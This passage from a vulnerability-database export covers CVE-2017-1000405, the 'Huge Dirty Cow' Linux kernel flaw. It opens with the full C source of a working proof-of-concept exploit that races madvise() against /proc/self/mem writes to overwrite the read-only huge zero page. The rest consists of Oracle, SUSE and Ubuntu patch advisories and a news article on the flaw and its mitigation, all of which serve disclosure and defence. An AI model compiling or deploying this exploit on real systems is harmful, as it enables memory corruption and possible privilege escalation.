"", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\n//\n\n//\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\n// Compile with \"gcc -pthread main.c\"\n//\n// November 2017\n// Bindecy\n//\n\n#define _GNU_SOURCE\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <fcntl.h> \n#include <unistd.h> \n#include <sched.h>\n#include <string.h>\n#include <pthread.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/wait.h> \n\n#define MAP_BASE ((void *)0x4000000)\n#define MAP_SIZE (0x200000)\n#define MEMESET_VAL (0x41)\n#define PAGE_SIZE (0x1000)\n#define TRIES_PER_PAGE (20000000)\n\nstruct thread_args {\n char *thp_map;\n char *thp_chk_map;\n off_t off;\n char *buf_to_write;\n int stop;\n int mem_fd1;\n int mem_fd2;\n};\n\ntypedef void * (*pthread_proc)(void *);\n\nvoid *unmap_and_read_thread(struct thread_args *args) {\n char c;\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\n \n memcpy(&c, args->thp_map + args->off, sizeof(c));\n read(args->mem_fd2, &c, sizeof(c));\n \n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\n usleep(10); // We placed the zero page and marked its PMD as dirty. \n // Give get_user_pages() another chance before madvise()-ing again.\n }\n \n return NULL;\n}\n\nvoid *write_thread(struct thread_args *args) {\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\n }\n \n return NULL;\n}\n\nvoid *wait_for_success(struct thread_args *args) {\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\n sched_yield();\n }\n\n args->stop = 1;\n return NULL;\n}\n\nint main() {\n struct thread_args args;\n void *thp_chk_map_addr;\n int ret;\n\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (args.thp_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n return -1;\n }\n if (args.thp_map != MAP_BASE) {\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\n goto err_unmap1;\n }\n \n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\n\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \n if (args.thp_chk_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n goto err_unmap1;\n }\n if (args.thp_chk_map != thp_chk_map_addr) {\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\n goto err_unmap2;\n }\n \n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\n if (ret) {\n perror(\"[!] madvise()\");\n goto err_unmap2;\n }\n\n args.buf_to_write = malloc(PAGE_SIZE);\n if (!args.buf_to_write) {\n perror(\"[!] malloc()\");\n goto err_unmap2;\n }\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\n \n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd1 < 0) {\n perror(\"[!] open()\");\n goto err_free;\n }\n \n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd2 < 0) {\n perror(\"[!] open()\");\n goto err_close1;\n }\n\n printf(\"[*] Racing. Gonna take a while...\\n\");\n args.off = 0;\n\n // Overwrite every single page\n while (args.off < MAP_SIZE) { \n pthread_t threads[3]; \n args.stop = 0;\n \n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\n \n if (ret) {\n perror(\"[!] pthread_create()\");\n goto err_close2;\n }\n \n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\n pthread_join(threads[1], NULL);\n pthread_join(threads[2], NULL);\n\n args.off += PAGE_SIZE; \n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\n }\n \n printf(\"[*] Success!\\n\");\n \nerr_close2:\n close(args.mem_fd2);\nerr_close1:\n close(args.mem_fd1);\nerr_free:\n free(args.buf_to_write);\nerr_unmap2:\n munmap(args.thp_chk_map, MAP_SIZE);\nerr_unmap1:\n munmap(args.thp_map, MAP_SIZE);\n \n if (ret) {\n fprintf(stderr, \"[!] Exploit failed.\\n\");\n }\n \n return ret;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5753", "CVE-2017-1000407"], "description": "[4.1.12-112.14.13]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n[4.1.12-112.14.12]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 27386890] \n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27403317] \n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27403317] \n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27403317] \n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27403317] \n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27403317] \n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317] \n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27403317] \n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27403317] \n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: 27397568] \n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) [Orabug: 27397001]", "edition": 4, "modified": "2018-01-18T00:00:00", "published": "2018-01-18T00:00:00", "id": "ELSA-2018-4017", "href": "http://linux.oracle.com/errata/ELSA-2018-4017.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-12192", "CVE-2017-16650", "CVE-2017-2618", "CVE-2017-1000405", "CVE-2017-12190"], "description": "[4.1.12-103.10.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200879] {CVE-2017-1000405}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044692] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069038] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069038] {CVE-2017-12190}\n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069065] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069065] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069065] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069065] {CVE-2017-15649}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215225] {CVE-2017-16650}\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148276] {CVE-2017-16527}\n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187217] \n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 27126129] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119628] \n- ocfs2: code clean up for direct io (Ryan Ding) \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27076919] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27062498] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27062498] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27062498] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27062498] \n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]", "edition": 4, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3651", "href": "http://linux.oracle.com/errata/ELSA-2017-3651.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:18:39", "published": "2017-12-14T15:18:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00043.html", "id": "SUSE-SU-2017:3297-1", "title": "Security update for the Linux Kernel (Live Patch 13 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_32 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:08:28", "published": "2017-12-14T15:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00031.html", "id": "SUSE-SU-2017:3284-1", "title": "Security update for the Linux Kernel (Live Patch 11 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_29 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:20:54", "published": "2017-12-14T15:20:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00045.html", "id": "SUSE-SU-2017:3300-1", "title": "Security update for the Linux Kernel (Live Patch 10 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-92_45 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:09:20", "published": "2017-12-14T15:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00032.html", "id": "SUSE-SU-2017:3285-1", "title": "Security update for the Linux Kernel (Live Patch 14 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_35 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:16:46", "published": "2017-12-14T15:16:46", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00041.html", "id": "SUSE-SU-2017:3295-1", "title": "Security update for the Linux Kernel (Live Patch 12 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:09:39", "published": "2017-12-06T21:09:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00012.html", "id": "SUSE-SU-2017:3226-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-6_12 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n", "edition": 1, "modified": "2017-12-14T21:12:53", "published": "2017-12-14T21:12:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00061.html", "id": "SUSE-SU-2017:3317-1", "title": "Security update for the Linux Kernel (Live Patch 4 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_6 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:16:54", "published": "2017-12-14T21:16:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00068.html", "id": "SUSE-SU-2017:3324-1", "title": "Security update for the Linux Kernel (Live Patch 2 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_3 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:13:56", "published": "2017-12-14T21:13:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00063.html", "id": "SUSE-SU-2017:3319-1", "title": "Security update for the Linux Kernel (Live Patch 1 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:08:45", "published": "2017-12-06T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00011.html", "id": "SUSE-SU-2017:3225-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:03", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "A flaw in the original patch for the notorious Dirty COW vulnerability could allow an adversary to run local code on affected systems and exploit a race condition to perform a privilege escalation attack.\n\nThe flaw in the Dirty COW patch (CVE-2016-5195), [released in October 2016](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>), was identified by researchers at the security firm Bindecy. On Wednesday, [they released details](<http://www.openwall.com/lists/oss-security/2017/11/30/1>) of the vulnerability ([CVE-2017-1000405](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405>)) found in the original Dirty COW patch, affecting several Linux distributions.\n\nThe scope of affected products is significantly smaller than the original Dirty COW bug, which impacted many more Linux distributions and the Android operating system.\n\n\u201cIn terms of scope, the difference is just that the current bug is not [applicable to Android](<https://threatpost.com/google-releases-supplemental-patch-for-dirty-cow-vulnerability/121843/>) and Red Hat Enterprise Linux. All other distributions \u2013 Ubuntu, Fedora, SUSE \u2013 suffer from the issue. So, the scope is still large. We estimate that millions of machines are vulnerable,\u201d said Daniel Shapiro, researcher at Bindecy, credited for finding the flaw along with colleague Eylon Ben Yaakov.\n\nThe vulnerability, CVE-2017-1000405, is rated \u201cImportant\u201d and scores 6.1 on the CVSS scale.\n\nRed Hat Software notified customers of the flawed patch on Thursday noting the issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, according to Red Hat\u2019s [customer portal](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\nDirty COW was patched in October 2016 after it was discovered in public exploits. The vulnerability was found in the copy-on-write (COW) feature in Linux and could be used by an attacker with local access to obtain root privileges on a Linux or Android device.\n\nThe flaw, which was introduced in 2007 in version 2.6.22 of the kernel, allows an attacker to elevate privileges by taking advantage of a race condition and gain write-access to read-only memory.\n\nThe flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\n\nCopy-on-write manages memory resources and allows for more than one process to share a page until a user writes to it, known in programming as marking a page dirty. The vulnerability allows an attacker to exploit the race condition to write to the original page before it\u2019s marked dirty.\n\nThe October 2016 patch addressed the Dirty COW vulnerability for both regular pages and transparent huge pages (supported since kernel approximately 2.6.38), according to Shapiro.\n\n\u201cThere is a code flow that wasn\u2019t taken into account that breaks the logic of the patch for transparent huge pages,\u201d he said.\n\n\u201cIn the original vulnerability the exploit targeted pages backed by read-only files, with the new bug we could write to a read-only special huge-page called \u2018zero page\u2019. It is assumed to be initialized with zeroes and some software rely on that assumption (including privileged processes),\u201d Shapiro said.\n\nA more detailed description of the flaw can be found in a technical write-up by Yaakov [here](<https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0>).\n\nAccording to the disclosure timeline, researchers reported the vulnerability to the Linux Kernel Organization on Nov. 22. A CVE was assigned the same day and a patch was committed to the mainline kernel Nov. 27. The vulnerability was officially made public on Friday.\n\nImmediate mitigation includes disabling the use of \u201czero page\u201d.\n\n\u201cIt is possible to prevent the zero page from being mapped as a huge page, by modifying a configuration tunable in the /sys directory\u2026 This prevents the flaw from being exercised in this method. # echo 0 > /sys/kernel/mm/transparent_hugepage/use_zero_page Disabling huge pages: It is possible to mitigate this flaw by disabling hugepages on a system,\u201d according to a [description of mitigations steps](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\n\u201cThe real deal here is the astonishing fact that such a hyped vulnerability was patched incompletely,\u201d Shapiro said.\n", "modified": "2017-12-01T11:43:06", "published": "2017-12-01T11:43:06", "id": "THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087", "href": "https://threatpost.com/flaw-found-in-dirty-cow-patch/129064/", "type": "threatpost", "title": "Flaw Found In Dirty COW Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-15T01:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-1", "href": "https://ubuntu.com/security/notices/USN-3510-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:43:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3510-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. 